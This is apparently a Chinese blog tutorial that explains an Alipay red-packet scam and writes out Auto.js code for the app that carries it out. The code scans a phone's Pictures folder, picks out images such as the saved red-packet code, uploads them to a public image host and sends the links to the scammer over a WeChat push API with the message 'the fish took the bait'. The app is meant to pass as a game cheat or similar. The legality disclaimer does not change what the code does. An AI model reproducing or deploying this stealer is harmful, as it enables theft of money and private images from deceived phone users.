盗刷支付宝口令新骗局(讲解与制作)
盗取支付宝口令红包,本文详细解释原理与制作过程
不要用于非法用途,微信推送接口,图床访问日志,支付宝收款等都可以找到你,网络不是法外之地
原理
骗子会让你发一个支付宝口令红包,说是来证明你有钱,等交易完成之后你再把口令给他,等你发了红包,这时候看似正常而又良心的商家会给你发一个软件,软件可能是某某游戏外挂,suo机生成器,甚至是色情软件,等你打开软件的那一刻,骗子也会收到一条名为“鱼咬勾了”的信息,你的口令就在那里面。
大佬看到这里就可以退出了,全文没有什么技术难点
思路
思路很简单,接下来一步一步实现
开始制作
语言选用autojs,用这个写简单
遍历指定目录
支付宝发送口令红包的时候会自动生成图片并保存到/storage/emulated/0/Pictures
中,但是为了代码以后升级与扩展,我还是决定把路径以参数的形式传进去
代码实现:
function getFilesFromPath(path) {
/*格式:getFilesFromPath(文件夹路径)*/
/*解释:获取文件夹所有文件和文件夹 递归遍历 返回文件路径数组*/
var arrDir = new Array();
var arrFile = new Array();
try {
var rp = /^([/][^\/:*?<>|]+[/]?)+$/;
if (rp.test(path) == false) throw "非法文件路径,H.getFilesFromPath(?);" + path;
} catch (err) {
log(err);
exit();
}
/*获取path目录下所有文件夹和文件*/
var arr = files.listDir(path);
/*遍历文件和文件夹*/
for (var i = 0; i < arr.length; i++) {
/*连接路径*/
newPath = files.join(path, arr[i]);
/*判断路径类型*/
if (files.isDir(newPath)) {
//arrDir.push(newPath);
/*递归遍历文件夹*/
//var arrF = getFilesFromPath(newPath);
//arrDir = arrDir.concat(arrF);
//注释这几行是递归遍历所有文件的,这里不需要,所以注释
} else if (files.isFile(newPath)) {
arrFile.push(newPath);
}
}
/*按字母升序排序数组*/
arrDir.sort();
arrFile.sort();
/*连接数组并返回*/
return arrDir.concat(arrFile);
}
正则筛选图片
这个其实是可以写入到上一个函数里面的,但是,一个函数一个功能,不能混,不然过几天我就看不懂自己的代码了
代码实现:
function imgPatt(arrdizhi){
var imgarr=[]
for(j=0;j<arrdizhi.length;j++){//遍历所有的文件
if(arrdizhi[j].search(/^.*?[.](bmp|jpg|gif|jpeg)/i)==false){//判断是否是图片,如果是就写入到数组中
imgarr[imgarr.length]=arrdizhi[j];
}
}
return imgarr;
}
上传图床
这一步其实是可以上传到自己服务器的,但是考虑到安全性,还是上传到图床比较稳
代码实现(上传):
function upImg(path) {
var url = "http://pic.sogou.com/pic/upload_pic.jsp";
var res = http.postMultipart(url, {
"file": open(path),
});
return res.body.string();
}
由于上传的不是一张图片,所以还得写个循环:
function arrUp(arrimg){
var arrurl_f=[]
for(i=0;i<arrimg.length;i++){
arrurl_f[arrurl_f.length]=upImg(arrimg[i])
}
return arrurl_f;
}
推送到微信
这里用的是Server酱的接口,用别的接口自己写吧(注意,我这里是把结果弄成md的形式上传的,这样微信收到的就可以直接看到,不需要再转到浏览器了)
代码实现:
function weChat(arrstr){
var md;
for(i=0;i<arrstr.length;i++){
md+="![]("+arrstr[i]+")\n";
}
var api="https://sc.ftqq.com/xxxxxxxxxxxxxxxxxxxxxxxx.send?text=鱼咬勾了&desp=";
var json_api = http.get(api+md).body.json();
return json_api;
}
至此,核心代码就已经写完了,往下我也不写了,再写就是帮助你犯罪了